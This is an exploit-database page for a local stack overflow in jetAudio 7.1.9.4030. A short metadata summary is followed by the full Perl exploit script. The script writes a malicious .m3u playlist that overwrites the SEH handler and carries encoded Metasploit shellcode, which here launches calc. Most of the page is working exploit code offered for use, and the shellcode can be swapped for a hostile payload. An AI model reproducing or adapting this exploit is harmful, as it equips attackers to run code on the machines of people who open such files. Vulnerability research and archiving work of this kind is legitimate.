header-logo
Suggest Exploit
vendor:
jetAudio
by:
corelanc0d3r
N/A
CVSS
N/A
Stack Overflow
Unknown
CWE
Product Name: jetAudio
Affected Version From: 7.1.9.4030 plus vx
Affected Version To: 7.1.9.4030 plus vx
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3
Unknown

jetAudio v 7.1.9.4030 plus vx (.m3u ) Local Stack Overflow

This exploit targets the jetAudio software version 7.1.9.4030 plus vx. It utilizes a RET - Universal method to trigger a local stack overflow vulnerability. The exploit has been tested on Windows XP SP3 En. The exploit was written by corelanc0d3r and can be found at http://www.milw0rm.com/exploits/9359. The payload is prepared by creating a malicious .m3u file named 'c0d3rsploit.m3u'. The exploit includes a shellcode that executes a calc command.

Mitigation:

Unknown
Source

Exploit-DB raw data:

# [+] Vulnerability     : jetAudio v 7.1.9.4030 plus vx (.m3u ) Local Stack Overflow 
# [+] Detected by       : HACK4LOVE (http://www.milw0rm.com/exploits/9359)
# [+] Product           : jetAudio
# [+] Versions affected : 7.1.9.4030 plus vx
# [+] -------------------------------------------------------------------------
# [+] Method            : RET - Universal !
# [+] Tested on         : Windows XP SP3 En
# [+] Xploit written by : corelanc0d3r  (corelanc0d3r[at]gmail[dot]com)
# [+] Greetz&Tx to      : Saumil/SK
# [+] -------------------------------------------------------------------------
#                                               MMMMM~.                          
#                                               MMMMM?.                          
#    MMMMMM8.  .=MMMMMMM.. MMMMMMMM, MMMMMMM8.  MMMMM?. MMMMMMM:   MMMMMMMMMM.   
#  MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:  
#  MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:  
#  MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:  
#  MMMMM=.     MMMMM=MMMMM=MMMMM7. 8MMMMM?    . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:  
#  MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:  
#  =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:  
#  .:$MMMMMO7:..+OMMMMMO$=.MMMMM7.  ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:  
#     .,,,..      .,,,,.   .,,,,,     ..,,,..   .,,,,.. .,,...,,,. .,,,,..,,,,.  
#                                                                   eip hunters
# -----------------------------------------------------------------------------
# Script provided 'as is', without any warranty. 
# Use for educational purposes only.
#

my $sploitfile="c0d3rsploit.m3u";

print " [+] Preparing payload\n";

my $header = "http://";
my $junk = "A" x 1017;
my $nseh = "\xeb\x06\x90\x90";  
my $seh = pack('V',0x01221045); 

# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
my $shellcode="\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" .
"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47" .
"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a" .
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46" .
"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45" .
"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c" .
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c" .
"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" .
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46" .
"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50" .
"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44" .
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" .
"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43" .
"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b" .
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43" .
"\x51\x42\x4c\x42\x43\x43\x30\x41\x41";


my $footer="E" x (2000-length(junk.nseh.seh.shellcode));

my $payload = $header.$junk.$nseh.$seh.$shellcode.$footer;

print " [+] Writing payload to file\n";

open(sploitf,">$sploitfile");
print sploitf $payload;
close(sploitf);
print " [+] Exploit file " . sploitfile . " created\n";
print " [+] Wrote " . length($payload) . " bytes\n";

# milw0rm.com [2009-08-05]